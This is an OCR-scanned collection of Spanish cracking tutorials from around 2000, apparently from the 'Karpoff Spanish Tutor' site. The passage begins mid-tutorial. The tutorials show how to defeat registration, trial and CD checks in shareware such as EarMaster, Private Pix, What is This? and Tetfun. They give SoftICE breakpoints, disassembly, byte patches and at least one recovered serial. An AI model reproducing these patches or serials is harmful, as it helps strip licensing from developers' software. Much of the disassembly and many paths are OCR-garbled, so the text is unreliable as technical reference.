posibilidades, sus protecciones. insisto en que lo considero altamente recomendable para todos aquellos que estén 
estudiando música o quieran trabajar su oído musical. más que nunca hay que señalar que, por respeto a los autores, 
no hay que desprotegerlo más allá de lo necesario para nuestros fines educativos. 

en otras palabras, el valor de este shareware excede al de su condición de “víctima”, como solemos decir. bien, 
vosotros veréis qué hacéis después de leer esto. siempre el mismo consejo: pagad por él si os interesa y si podéis 
permitiroslo. ah, y el programa está en español, salvo la ayuda. 


los pasos para desproteger esta pieza vienen a ser estos: 
* introducir unos datos para matricularlo y provocar así la aparición del mensaje “este no es un número de 


registro válido” 


* localizar las rutinas de protección con softice 

* aislar la variable responsable de la condición “usuario registrado” 

* modificar el código en el punto preciso para que el programa asuma en todo momento dicha condición. 
por tanto, este tutorial es del tipo “simular estar registrados”. 
este escrito está especialmente dirigido a principiantes con cierta experiencia en el uso de las herramientas del 
"oficio". por eso no voy a entrar en detalles acerca del manejo de las mismas, salvo en aquellos puntos que considere 
puedan tener cierto interés. 


al atake 


la instalacion 

antes de instalar la aplicación usé installwatch para sabér qué archivos y entradas del registro se creaban, borraban o 
modificaban. teniendo herramientas como apispy 32, regmon y filemon no merece mucho la pena esperar todo ese tiempo 
que los programas tipo installwatch precisan para “sacar una foto” del disco duro antes de instalar, y otra despúes. 
installwatch presenta una ventaja: analiza a la vez ficheros corrientes y entradas del registro. pero también hay otra pega: 
muchas aplicaciones generan o modifican archivos y/o entradas del registro tras usarlos por primera vez y no en el proceso 
de instalación. y earmaster es uno de ellos. teniendo en cuenta esa posibilidad usé regfix. este es un programa que toma una 
instantánea del registro en un momento dado y otra después y las compara, de modo que se puede sabér qué entradas han 
sido creadas, modificadas y eliminadas. 

una foto antes de ejecutar por primera vez el programa... y otra tras cerrarlo... uhmmm... una entrada creada: smidxpd/ emv 
(¿será por lo de earmaster versión 4?) en efecto, esta entrada es la encargada de controlar los días que llevamos de 
evaluación. si adelantamos el reloj del ordenador para caer fuera del periodo de evaluación, ejecutamos el programa y luego 
lo volvemos a retrasar, el programa se da cuenta y nos deja fuera de juego. si se borra esta entrada, volveremos a disfrutar del 
periodo entero de evaluación. en esta entrada se guardan codificadas las dos últimas fechas de ejecución del programa. 
antes de comenzar con la tarea, conviene ejecutar el programa para configurarlo correctamente y que no nos aparezcan esas 
pantallas en pleno fregado. se trata de proporcionar un nombre, verificar el sonido y elegir el nivel de dificultad de los 
ejercicios. 


echando un vistazo 

al ejecutar el programa aparece una nag que permanece, sin poderlo remediar, unos segundos y que nos recuerda que se trata 
de una copia no registrada y de evaluación. nos ocuparemos de ella más adelante porque ahora vamos al meollo del esquema 
de protección. al desaparecer la nag, el programa nos ofrece la posibilidad de ingresar un nombre y un n” de serie, lo cual ya 
es mucho porque nos evitará tener que “personalizar” títulos de ventanas y demás detalles que hay que pulir cuando lo único 
que se puede hacer es prolongar el periodo de evaluación y no nos podemos librar de la condición de no-registrados. 
escribimos nuestros datos y, antes de pulsar el botón, vamos a softice y ponemos un par de breakpoints (messageboxa, 
getdlgitemtexta). no pasa nada. 

plan b: bpx hmemcpy. softice salta y pulsamos f12 hasta llegar al código de earmaster (está escrito sobre la línea verde de la 
"code window"). hemos aterrizado en un punto lejano porque se ven varios pop (registros restaurados antes de regresar a la 
rutina superior) seguidos de ret. vamos dando f12 para llegar hasta el final de las correspondientes subrutinas, hasta que 
aparecemos en :004d6a7c call 4e8a38. aquí ya se ve que estamos en algo importante. quitamos el bpx hmemcpy y f3 para 
que se siga ejecutando el programa y salir de softice. 

así aparece en w32dasm la parte correspondiente en el listado muerto: 


* referenced by a (u)nconditional or (c)onditional jump at address: 


1:004d69c1(c) 

| 

:004d6a4e  8b86f8020000 mov eax, dword ptr [esi+000002f8] 
:004d6a54  80b8f401000000 cmp byte ptr [eax+000001f4], 00 
:004d6a5b 08490000000 je 004d6af1 

:004d6a61  8b8600030000 mov eax, dword ptr [esi+00000300] 
:004d6a67 8b10 mov edx, dword ptr [eax] 
:004d6a69  ff92b8000000 call dword ptr [edx+000000b8] 
:004d6a6f 84c0 test al, al 

:004d6a71 747e je 004d6afl 

:004d6a73  8d55f4 lea edx, dword ptr [ebp-0c] 
:004d6a76 8b8610030000 mov eax, dword ptr [esi+00000310] 
:004d6a7c esb7eTf5ff call 00435238 

:004d6a81  8b45f4 mov eax, dword ptr [ebp-0c] 
:004d6a84 es47190100 call 004e83d0 

:004d6a89 8b151c0d5200 mov edx, dword ptr [00520d1c] 
:004d6asf 8802 mov byte ptr [edx], al 

:004d6a91 all1cOd5200 mov eax, dword ptr [00520d1c] 
:004d6a96 803800 cmp byte ptr [eax], 00 

:004d6a99 7433 je OO4d6ace 

:004d6a90b aldc155200 mov eax, dword ptr [005215dc] 
:004d6aa0  c60000 mov byte ptr [eax], 00 

:004d6aa3 8d55f4 lea edx, dword ptr [ebp-0c] 
:004d6aa6  8b8608030000 mov eax, dword ptr [esi+00000308] 


:004d6aac es87e7f5ff call 00435238 


:004d6ab1  8b45f4 mov eax, dword ptr [ebp-0c] 
:004d6ab4 50 push eax 

:004d6ab5  8d55f0 lea edx, dword ptr [ebp-10] 
:004d6ab8 8b8610030000 mov eax, dword ptr [esi+00000310] 
:004d6abe es7Se7f5ff call 00435238 

:004d6ac3  8b45f0 mov eax, dword ptr [ebp-10] 
:004d6ac6 Sa pop edx 

:004d6ac7 es6c1f0100 call 004e8a38 

:004d6acc eb23 jmp 004d6af1 


vamos paso a paso con f10 hasta llegar a la instrucción je OO4d6ace. veamos qué pasa si ese salto que softice indica se va a 
producir, no se ejecuta. tecleamos r eip (enter) el cursor se desplaza al registro eip y lo llevamos hasta el último dígito (9) 
para teclear b (enter), con lo que obtenemos la dirección de la siguiente instrucción (004d6a9b). 

f5 y ¡toma! no aparece ningún mensaje. parece que hemos conseguido algo. en el título de la ventana principal ya no figuran 
los días que llevamos, ni que se trata de una versión de evaluación. vamos a ayuda/acerca de earmaster 4/ y vemos en la 
pantalla (que es la nag del principio) el nombre y el n* que pusimos. y una duda...si cerramos y volvemos a ejecutar el 
programa, ¿se verán nuestros datos sometidos a las comprobaciones de las rutinas de registro? respuesta: si. es decir, 
volvemos a estar no-registrados, pero los datos introducidos ya han pasado a la carpeta de earmaster en el registro de 
windows. cuando el programa se vuelve a ejecutar, los recupera y los verifica. como comprueba que no son buenos, los 
ignora y se ejecuta en modo “no-registrado”, pero no los borra del registro. 


el plan 


la siguiente tarea es determinar qué es lo que provoca que el salto :004d6a99 7433 je OO4d6ace se produzca. encima del 
salto hay una comparación: :004d6a96 803800  cmp byte ptr [eax], 00 se compara con O el byte que hay donde indica 
eax. si nos fijamos en el trozo de código resaltado de arriba, se ve que eax apunta a lo que hay en 00520d1c. hay que ir a 
softice para mirar esto. volvemos a introducir los datos para registrar y antes de pulsar el botón vamos softice para poner un 
bpx :004d6a84 . salimos de softice; pulsamos el botón para aceptar los datos. aparecemos otra vez en softice. trazamos con 
f10 las cuatro instrucciones que nos separan de la comparación, fijándonos en los valores que van tomando los registros y 
variables implicados. llegamos a la comparación y tenemos que el valor de eax es :005191a8. tecleamos d eax para ver qué 
es lo que hay y aparece que el primer byte es 00. con el ratón cambiamos ese valor en la ventana de datos y ponemos 01. f5 y 
salimos de softice. volvemos a estar registrados. es muy probable que 005191a8 sea "flag city", es decir, donde se guarda la 
variable que controla si somos usuarios registrados o no. ahora hay que ver dónde se inicializa (se le asigna un valor) y 
alterar el código de modo que ese valor sea el que nos convenga. para seguir los movimientos de esa variable vamos a poner 
un bpm 005191a8 w, de modo que cada vez que el programa escriba algo ahí, salte softice. de nuevo ejecutamos ear40.exe 
con el loader y sice se detiene en :004e8724 . 


en w32dasm vemos este trozo de código: 


* possible stringdata ref from code obj ->"serial" 


:004e8705  ba74894e00 mov edx, 004e8974 
:004e870a al170055300 mov eax, dword ptr [00530570] 
:004e870f  ess09dfoff call 00482464 

:004e8714  8b45fc mov eax, dword ptr [ebp-04] 
:004e8717  esb4fcffff call 004e83d0 

:004e871c  8bd8 mov ebx, eax 

:004e871e 881das8915100 mov byte ptr [005191a8], bl 
:004e8724  a0a8915100 mov al, byte ptr [005191a8] 
:004e8729 3401 xor al, 01 

:004e872b  a2a4915100 mov byte ptr [00519144], al 
:004e8730  803da891510000 cmp byte ptr [005191a8], 00 
:004e8737  745b je 004e8794 

:004e8739  8b45fc mov eax, dword ptr [ebp-04] 
:004e873c 8078082d cmp byte ptr [eax+08], 2d 
:004e8740 7516 jne 004e8758 

:004e8742  8d45fc lea eax, dword ptr [ebp-04] 
:004e8745 50 push eax 

:004e8746 b908000000 mov ecx, 00000008 


:004e874b ba01000000 mov edx, 00000001 


:004e8750 8b45fc mov eax, dword ptr [ebp-04] 
:004e8753 es38baflff call 00404190 


en el trozo de código resaltado se ve cómo tras una llamada se mueve a ebx el valor de eax, luego el valor de bl se pasa al 
byte que hay en 005191a8 (sección de datos); el valor de ese byte se pasa a al y se xorea con 01. el resultado se mueve al 
byte en 5191a4. por último se compara el byte en 005191a4 con cero y se ejecuta el salto si da cero. nopear este último salto 
no nos sirve porque debe haber una doble comprobación, debida probablemente a un segundo flag (en 005191a4). lo mejor 
es, por tanto, conseguir que siempre se pase un 01 a 005191a8. esto lo podemos hacer modificando el código en 

:004e871c  8bd8 mov ebx,eax cambiando esta instrucción por: 

:004e871c  b301 mov bl, 01 

primero se prueba en softice (poniendo un bpx en :004e871c, y trazando con f10 cuando se detiene la ejecución, para 
observar lo comentado). para cambiar la instrucción,cuando llegamos a 004e871c tecleamos a eip (enter); mov bl, 01 
(enter, enter); f5 para dejar correr el programa. 

con este cambio conseguimos engañar al programa. en la nag (y en el acerca de) aparecen los datos que pasaron al registro 
cuando cambiamos el salto en :004d6a99.ya no aparece el diálogo para registrarse, ni que es un versión de prueba con los 
días que llevamos, en el encabezado de la ventana principal. 

ahora hay que editar el archivo para que el cambio sea definitivo. para ello vamos al editor hexadecimal. (si no tienes 
experiencia con los editores hexadecimales, consulta mis otros tutoriales, en los que se explica con más detalle cómo hacerlo; 
también tienes un pequeño monográfico sobre el uso básico de hiew, en la página de karpoff). 


la nag 

a pesar de "estar registrados" el programa nos sigue obsequiando con la nag, nada más iniciarse. no, gracias; ya sabemos lo 
que va a poner. ejecutamos el programa desde el cargardor de softice y vamos trazando con f10 desde el principio. supuse 
que no tardaría mucho en dar con ella porque sale justo al principio; y así fue. nos vamos fijando en el código o apuntando 
las "call" por las que pasamos antes de llegar a la que dispara la nag y luego el resto del programa. en este caso la tenemos en 
:00515093. volvemos a ejecutar desde el loader, ponemos un bpx en esa dirección y, cuando para, hacemos click con el ratón 
en el registro eip para cambiar su valor, de modo que este sea ahora el correspondiente a la instrucción siguiente a la llamada 
que nos muestra la nag. enter y f5. et voila! el programa se lo piensa un poquillo antes de iniciarse, pero no aparece la nag. de 
nuevo, hay que editar el archivo con un editor hexadecimal para fijar el cambio. como de costumbre, recomiéndase no 
nopear los cinco octales de la llamada, sino tomar soluciones más seguras como 40 48 90 40 48. 


despedida 

hemos terminado. 

saludos a todos los componentes de tutoriales2000, y especialmente a aquellos que no dudan en echar una mano en cuanto 
pueden. también, a esos que están escribiendo cosas de carácter más teórico y general porque nos ayudan a organizar un poco 


todo el batiburrillo de la información que se va acumulando en nuestras cabezas. 
para lo que queráis, mandad unas líneas a 


f frantice hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: 


Private Pix v2.11 


PROTECCION: Numero de Serie 

DESCRIPCION: Un sharewarecito que te permite tener control de tus imagenes encryptandolas para que 
nadie las pueda ver 

DIFICULTAD: PRINCIPIANTE/AFICIONADO/PROFESIONAL 

DOWNLOAD: http://www tropsoft.com/ 

HERRAMIENTAS: ¡Soft Ice v xx.xx 

CRACKER: 


PrfEsOr X | FECHA: 30/octubre/2000 


introduccion 


hola a todos, otra vez mas aqui con ustedes, ahora con un programita a el cual le 
encontraremos su numero de serie valido usando un break point poco utilizado el 
__vbastrtoansi este se utiliza para los programas hechos en visual basic. 


| crackeando 


bueno amigos empesemos con este memjurgue, lo primero que hay que hacer es configurar el soft ice para que funcionen los 
break points para los programas de visual basic, los pasos a seguir son: 


1.- abrir el winice.dat 


2.- modificar el winice.dat agregando las siguientes lineas coloreadas en verde a su winice.dat 


OO OOTOORÓ examples of sym files that 


can be included if you have the sdk ***** change the path to the appropriate drive and directory 


load=c:¡Wwindowsisystemluser.exe 


load=cXwindowsisystemigdi.exe 


load=cWwindowsisystemikrn1386.exe 


load=c¡Wwindowsisystemimmsystem.dll 


load=c¡Wwindowsisystemiwin386.exe 
load=c¡Wwindowsisystemimsvbvm50.dll 
ee examples of export symbols that can be included ***** change the path to the appropriate drive and directory 
exp=cWwindowsisystemivga.drv 
exp=cWwindowsisystemivga.3gr 
exp=cwindowsisystemisound.drv 
exp=cwindowsisystemimouse.drv 
exp=cwindowsisysteminetware.drv 
exp=cwindowsisystemisystem.drv 
exp=c:lwindowsisystemikeyboard.drv 
exp=cwindowsisystemitoolhelp.dll 
exp=cwindowsisystemishell.dll 
exp=cwindowsisystemicommdlg.dll 
exp=cwindowsisystemiolesvr.dll 
exp=cAwindowsisystemlolecli.dll 
exp=c:lwindowsisystemimmsystem.dll 
exp=cAwindowsisystemiwinoldap.mod 
exp=cwindowslprogman.exe 
exp=cwindowsidrwatson.exe 


ee examples of export symbols that can be included for windows 95 ***** change the path to the appropriate drive and 
directory 


exp=cwindowsisystemlkernel32.dll 
exp=cAwindowsisystemluser32.dll 
exp=cWwindowsisystemigdi32.d1l 
exp=clwindowsisystemicomdlg32.d1l 
exp=cwindowsisystemishell32.dll 
exp=cwindowsisystemiadvapi32.dll 


exp=cXwindowsisystemishell232.dll 


exp=cwindowsisystemicomctl32.dll 

exp=cwindowsisystemiertdll.dll 

exp=cWwindowsisystemiversion.dll 

exp=cWwindowsisysteminetlib32.d1l 

exp=cwindowsisystemimsshrui.dll 

exp=cWwindowsisystemimsvbvm50.dll <direccion donde se encuentra instalada la dll de vbasic 
exp=cWwindowsisystemimsnet32.d1l 

exp=cwindowsisystemimspwl32.d1l 

exp=cWwindowsisystemimpr.dll 


una vez hechos esos cambios en el winice.dat tenemos que reiniciar la pcera para ejecutar de nuevo el softice y que los 
cambios se establescan, ya listo todos los cambios procedemos a la instalacion del programa private pix v 2.11 el cual 
ejecutaremos y la primera ventana que saldra es una en la cual hay que insertar un password " private " el cual nos continuara 
ejecutando el programa, una vez en el private pix, empesamos a analiar y vemos un menu que dice register en la cual 
aparecen dos caption box en las cuales en mi caso insertare: 


Pruvate Pix [tm] Registration 


ya estando ahi! y antes de dar click en register, damos control d para saltar al softice en cual pondremos bpx __vbastrtoansi 
damos enter y despues control d otra vez para regresar al programa y ya estando listo todo, damos click en el boton register y 
saltamos inmediatamente a el softice, caeremos en 


0167: Of0cfd40 c20800 ret 0008 
msvbvm50! _ vbastrtoansi 
0167: Of0cfd43 56 push edi 


A e e A RR AR AR 


despues damos f11, despues f5 y por ultimo f11, lo cual nos mandara al siguiente codigo: 


016: 00452a31 50 push eax < se pone un valor en eax> 


"un "un 


si damos d eax nos saldra en la ventana de datos "" profesor x 
buen camino!!!!:), despues damos f10 dos veces hasta llegar a : 


nuestro nombre ...... Mmmmmmmmamm creo que vamos por 


0167: 00452a37 8bf0 mov esi,eax 


estando ahi vamos a ver los valores de los acumuladores con la instrucción d "acumulador" y cuando mostramos el valor de 
edx vemos que contiene en la direccion de memoria virtual en la ventana de datos: 


O16f: 69f2d4 3941 4242 3337 dncccccniciccininnnnnn a9bb73ed44 


mmmm... vemos ahi un numero sospechoso, pero si vemos una linea mas arriba en la ventana de , vemos nuestro numero 
introducido 11111111 y justo despues a9bb73ed44 mmmm... creo que ese es nuestro serial correcto, lo apuntamos y vamos a 


nuestro objetivo se cumplio pudimos conseguir el serial correcto!!!!. 


nota : cuando quise usar este metodo para los demas sharewarecitos de esa empresa, no me funciono para nada este 
metodo, ya en otros tutoriales les mostrare como se consigue un serial para los demas.....:) 


saludos a to2 los amigos de tutoriales 2000, a txeli, karpoff y skuater.......y a los amigos de el canal del irc hispano +tcrackers. 


aqui va tu mail 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: TNT—-Demian.CrackME .CD-Check. (En) _TNT19 

PROTECCION: CD check. 

Objetivo: Saltarse el CD-Check. 

Descripcion: si no tienes un CD introducido no te deja seguir. 

Dificultad: Facil. 

DOWNLOAD : http: /¿kicekme,toftent/ 

Herramientas: Softice, W32dasm, Editor Hexadecimal, IceDump 

CRACKER: Txotxo FECHA: 5/11/2000 
introduccion 


bueno, para empezar el programa está comprimido/encriptado con telock. el programa mira en todas las 
unidades de cd-rom/cd-rw en busca de los cds introducidos. si alguna de esas unidades no tiene un cd 
introducido, el programa no seguirá hasta que se introduzca el cd. 


al atake 


para empezar, cargamos el icedump. y abrimos el sice. cargamos el programa y el msvbvm60.dll. 
vamos. sabemos que todos los programas de vb comienzan así: 

push XxxxXXxX 

call msvbvm60!thunrtmain 


por ello, ponemos un bpx en thunrtmain. lo ponemos, y nos rompe dentro de la funcion. vamos a ensamblar un ret. con 
el comando a ponemos un ret. y pulsamos f10. ya estamos fuera. 


ahora, usaremos el icedump. ponemos lo siguiente: /pedump 400000 16f0 d:¡icrackme.exe. esto nos creara donde le 
hayamos dicho el programa descomprimido, con todas las importaciones, y perfectamente ejecutable. lo ejecutamos y 
.... Ohhhh. el programa comprueba el crc. es hora de usar el w32dasm. 


abrimos el w32dasm, y buscamos con el string refs, "exe don't have a crc footer". y vamos subiendo hacia arriba 
mirando saltos, comprobando los saltos. no hagais mucho caso a los jge. deberemos llegar a un salto incondicional. 
exactamente 4033be. y vemos que después hay otro jmp. pues vamos a hacer que el salto de 4033be salte a ese otro 


salto y el programa siga. entramos con el sice, y apuntamos los bytes necesarios para partxearlo (e9ad220000). bien, lo 
partxeamos y ejecutamos. y nos pone eso de que introduzcamos el cd. buscamos con el w32dasm el string, y miramos 
un poco mas arriba. y vemos un jnz (404b8c). que por supuesto habrá que partxear para que todo funcione como 
queremos. entramos en el sice, y ponemos un breakpoint en 404b8c, y al romper ponemos un jmp. los bytes que hay 
que poner son los siguientes: e9b200000090. 


y se acabó. ya está. está crackeado. 


bueno, para acabar, quiero mandar saludos a todo el grupo de tutoriales 2000, en especial al profe, karpoff, birkin, 
viper, y a toda esa peña. y a turbop, a ver si crackeas mi crackme txabalote. 


mas información en mi página web:  www.geocities.com/ttxotxo 


y si quereis contactar conmigo: mandarme un mail 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: What is This? v 2.01 (buid 040) 
PROTECCION: Serial 
Objetivo: Conseguir un número de serie válido 
Descripcion: añade información útil a tus ficheros 
Dificultad: Newbie 
DOWNLOAD : http: / /www.jimjams. com 
Herramientas: Softice 4.05, file insPEctor 3.0 
CRACKER: Act Mago FECHA: 01/11/2000 
INTRODUCCION 
introducción 


hola amigos, presento mi noveno tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoOhotmail. com , como siempre digo...sólo preguntas referentes a este tutorial y no 
pedidos u otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado 
puedes bajártelo en www. crackstore.com . asumo que tienes conocimientos básicos sobre el 
uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


comentario del programa 


añade información variada a tus ficheros"what is this?" es una pequeña y util extensión 
del sistema. permite almacenar y visualizar extensiones del sistema con facilidad. es fácil de 
usar. tan sólo tienes que hacer clic en el botón derecho para activar los menús contextuales, 
y escoger la opción "what is this?". si la entrada seleccionada tiene una correspondencia en 
la base de datos, la mostrará. 


lo que nos interesa...el programa es shareware, viene con libre uso de 31 días, después de 
este período deberás registrarte o borrar el software de tu computadora. para registrarte 
debes pagar us$20... : ( 


contamos con softice... 


al atake 


quizás acabas de instalar el programa y no sabes como ejecutarlo...debes hacer esto: 


Abrir 
SE Addto archive... 
BE Addto"winamprar” 
SH) Addto Zip 
SÍ Add to winamp.zip 
Hex Edit 


Send To » 
Cortar 


Copiar 


Crear acceso directo 
Eliminar 

Cambiar nombre 
Propiedades 


dale click y el programa analizará el archivo al que le diste click en una ventana como esta... 


Xara MaradD AO. exe 


what is This >. CAProgram Files! 


E CAProgram FilestXaraWXara3D3'* D-asert Registration K 

Su |Size: 1025024 nsert Hegistration ey] 
—|áttributes: ARCHIVE 

Creation Date: 2009200 16:33:27 

Last Update Date: 20/09/00 16:33:28 

Last Access Date: 28710400 


— ACompary Name: — XaraLtg 
2) MPTOdace ame” 230" Ap ¿¡ABO UT 
File Description: 3D Application 


donde está el cuadrado (insert registrayion key) con bordes rojos debes hacer click para acceder a la 
Caja de registro, la que nos pide los siguientes datos... 


user name: 
registration number: 


llenamos la caja con nuestro nombre y serial number al azar, le damos click a ok y como el 
programa no es estúpido por supuesto que no aceptará el número de serie y además no mostrará 


ningún mensaje de registro falso o no válido, pero ...cómo sabemos que no lo ha aceptado? 
respuesta: cerramos el programa, lo volvemos a abrir y vamos a about y veremos esto: 


What is This ? - CAProgram File: 


¡AMA 128 


SY = 

Ss Méhatis This ? - Version 2.01 [build 040] 

S 9 Copyright 1997-1998 by M.Pacchiarotti - Jimiams 
3 Home: http: 44 jimiars. com 

pl ] Register online: http: +2wwww.jimjams.com+xreg. htral 
y mailto:marioAjimjams.com - mailto: jimjamsE3melink.it 
0 Used ltems: O 

UE Unregistered Evaluation Copy 


hmmm, no nos resultó el registro al azar: ) ... 


a continuación...cerramos what is this? 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y 
para eso utilizaremos el genial file inspector v3.0 el que nos mostrara si está encriptado y también 
en que leguaje está hecho. abrimos file inspector v3.0 luego vamos a abrir archivo, y cuando 
hayas abierto el ejecutable wit.exe el que es guardado en x:1windowswit.exe luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


Y, -= file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


Bert nn anrn nadien ras 06! 


Datos PE | Secciones | Importaciones/Exportaciones : r: Herramientas | Acerca de... | 


Reconocimiento de signaturas 
Compilador; Borland Delphi 3.0 
Signatura: 
Versión de la DLL: fi «D Información... 5 Asociar EXE*s 


Versión del enlazador; [2.25 Versión de la imagen: fo.o 
Versión del SO; fi 0 Versión del subsistema; fa.o 


(ES Abrir archivo... (Ed Analizar (F salir 
INSWINDIOMWS ib ase 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido 
softice para conseguir un número de serie válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 

asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su 
Uso. 

a continuación...abrimos what is this? y vamos directamente a la caja de registro en donde 
introducimos nuestro nombre y cualquier número de serie . todavía no damos click en ok ; lo que 
ahora debemos hacer es presionar control+d para que salte el softice y así poder colocar nuestro 
breakpoint. 

ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos 
f5 para salir del softice. ahora le damos click a register y si todo sale bien el bpx debería picar y hace 


Saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos 
aquí: 


O15f: 0044fa58 8b55f0 mov edx, [ebp-10] 
luego f10 20 veces para llegar aquí: 


O15f: 0044faal 8b45fc mov eax,[ebp-04] --------- > si aquí colocamos d edx veremos nuestro 
nombre. 


luego f10 1 vez para llegar aquí: 

015: 0044faa4 8b533c mov edx, [ebx+3c] 

si aquí colocamos d edx nuevamente veremos nuestro nombre y si colocamos d eax veremos esto: 
069495908567 

ya lo hemos conseguido, pero... cómo estar seguros? 

podemos darle a f10 1 vez para llegar aquí: 


O15f: 0044faa7 esOc43fbff call 0O403db8 ----------- > d edx = 1233321<span 


Karpoff Spanish Tutor 


Tetfun 2000v1.1/5, Colorfun y jBall 


Programa: 


PROTECCION: Serial 


Descripcion: Clon del tetris y otros juegos. 
Dificultad: Facilucha 

DOWNLOAD: http://jaibosoft.8m.com 
Herramientas: Softice 


CRACKER: Yerba Mate N* 9 FECHA: ../11/2000 


INTRODUCCION 


En esta oportunidad vamos a pensar un rato juntos. El programador hizo las cosas de forma tal que por más 
que busquemos el los registros, nunca veremos el serial completo. El programa está bien logrado y el precio 
que pide por el, teniendo incluidas todas las posteriores actualizaciones, es realmente accesible. Donde estuvo 
levemente mezquino es en dejarnos probarlo solamente 7 días. Como siempre la única razón de este tutorial 


es analizar su protección, distinta a la que hemos visto hasta la fecha. No te preocupes por la versión que 
consigas. En principio este tutorial está escrito para la v1.1 pero también analizaremos la versión 1.5 (distinta 
por cierto). Al final como es costumbre te dejaré para que practiques, un programa con el esquema de 
protección de la versión1.1 y otro con el de la última versión. Espero que lo disfrutes. 


AL ATAKE | 


dí con este programa a travez de un amigo, que lo había sacado del cd de una revista. en concreto se trataba de la versión 
1.1, digo trataba porque ahora la versión que vas a encontrar en la página del autor es la 1.5.( no te preocupes que al final le 
dedicaré algunas líneas a esa versión ). vamos, como es costumbre, a ir recorriendo juntos el sistema de protección y tal vez 
(como me pasó a mí) veas algo distinto. 

como de costumbre vamos a register e introducimos nombre y serial ( en mi caso yerba mate y 12345678) 


esta vez dejo que te copies mi serial ;-). si ponés el tuyo tratá de no repetir números, ya verás por que. a lo nuestro, ponemos 
un bpx hmemcpy y presionamos register. el soft-ice entra en algún lugar del user. borramos el breakpoint que ya cumplió su 
función con be*. como el user no es la sección que nos interesa vamos presionando f12 hasta llegar a la parte en que checkea 
nuestro serial. esto es unas 13 veces. hecho esto llegaremos aquí: 


:0040436b esddcf0200 call 0043134d 


:00404370 8b9684000000 mov edx, dword ptr [esi+00000084] pone en edx 12345678 
:00404376 8dbe84000000 lea edi, dword ptr [esi+00000084] 

:0040437c 83741808 cmp dword ptr [edx-08], 00000008 compara el largo del serial con 8 
:00404380 744b jz 004043cd salta 


cuando introducimos el código falso no sabíamos nada del verdadero. ahora sabemos que el largo del serial tiene que ser 
igual a 8 caracteres. por que digo esto?. porque si no salta, cuando llegues al call 4364ab sale el mensaje de error. como de 
casualidad el largo es igual a 8 no tendremos problema y saltará.seguimos avanzando con f10 hasta llegar aquí: 


:004043d4 8a0411 mov al, byte ptr [ecx+edx] 

:004043d7 3c30 cmp al, 30 compara con O 
:004043d9 7426 jz 00404401 

:004043db 3c31 cmp al, 31 con 1 
:004043dd 7422 jz 00404401 

:004043df 3032 cmp al, 32 con 2 
:004043e1 741e Jz 00404401 

:004043e3 3033 cmp al, 33 con 3 
:004043e5 74la jz 00404401 

:004043e7 3034 cmp al, 34 con 4 
:004043e9 7416 Jz 00404401 

:004043eb 3035 cmp al, 35 con 5 
:004043ed 7412 jz 00404401 

:004043ef 3036 cmp al, 36 con 6 
:004043f1 740e jz 00404401 

:004043f3 3c37 cmp al, 37 con7 
:004043f5 740a jz 00404401 

:004043f7 3c38 cmp  al,38 con 8 
:004043f9 7406 Jz 00404401 

:004043fb 3039 cmp al, 39 con 9 
:004043fd 7402 Jz 00404401 

:004043ff 33db xor ebx, ebx 

:00404401 41 inc ecx 

:00404402 831908 cmp  ecx, 00000008 vuelve arriba hasta 
:00404405 7Tccd jl 004043d4 completar los 8 caracteres 


todo esto sirve para verificar que los caracteres del serial sean números. ( cada loco con su tema ;-) ). seguimos juntando 
pistas, ahora sabemos que el serial esta compuesto por 8 números. inmediatamente después se fija que nuestro nombre esté 
comprendido entre 3 y 256 caracteres (no muy difícil de acertar). 


no te voy a aburrir con más detalles. vamos al grano. el programa ahora toma nuestro serial (12345678), lo parte en cuatro 


números de dos cifras y en principio lo pone en el edx. canentá y elongá bien el dedo índice y sacudile duro a £10 hasta 
alcanzar la dirección xxxx:004045a3 


:004045a3 8b542414 mov edx, dword ptr [esp+14] d edx 


allí se pone en edx lo anteriormente dicho. presionamos f10 una vez para que pase el valor a edx si hacemos dedx veremos 
la siguiente tablita de valores: 


seguimos trazando con f10 hasta llegar a ver lo siguiente. 


:004045cb e870020000 call 00404840 llamada a la rutina de comprobación 
:004045d0 85c0 test eax, eax test 
:004045d2 7539 jne 0040460d salto condicional 


no te desesperes que ya falta poco ;-) . una vez que llegamos a 4045cb pulsamos f$ para meternos dentro de el call. una vez 
ahí veremos lo siguiente: 


200404840 82442404 mov al, byte ptr [esp+04] pone Oc en al Oc en hexa = 12 en decimal 
:00404844 8a4c2410 mov cl, byte ptr [esp+10] 4e en cl 4e en hexa = 78 en decimal 
:00404848 8a54240c mov dl, byte ptr [esp+0c] 38 en dl 38 en hexa = 56 en decimal 
:0040484c 53 push ebx 

:0040484d 8aSc240c mov bl, byte ptr [esp+0c] 22 en bl 22 en hexa =34 en decimal 
:00404851 3c46 cmp al, 46 compara los dos primeros números de nuestro serial con 70 (46 en hexa) 
:00404853 7518 jnz 0040486d 

:00404855 80fb25 cmp bl, 25 3 y 40 con  37(25 en hexa) 
:00404858 7513 jnz 0040486d 

:0040485a SOfa41 cmp dl, 41 Sy 6 con 65 (41 en hexa) 
:0040485d 750e jnz 0040486d 

:0040485f 801922 cmp cl, 22 Ty8 con 34 (22 en hexa) 
:00404862 7509 jnz 0040486d 

:00404864 b801000000 mov eax, 00000001 

:00404869 Sb pop ebx 

:0040486a c21000 ret 0010 


si cualquiera de las comparaciones anteriores no es igual pasa al siguiente grupo de comparaciones 


:0040486d 3c50 cmp al, 50 1? y 22 con 80 (50 en hexa) 
:0040486f 7518 ¡nz 00404889 

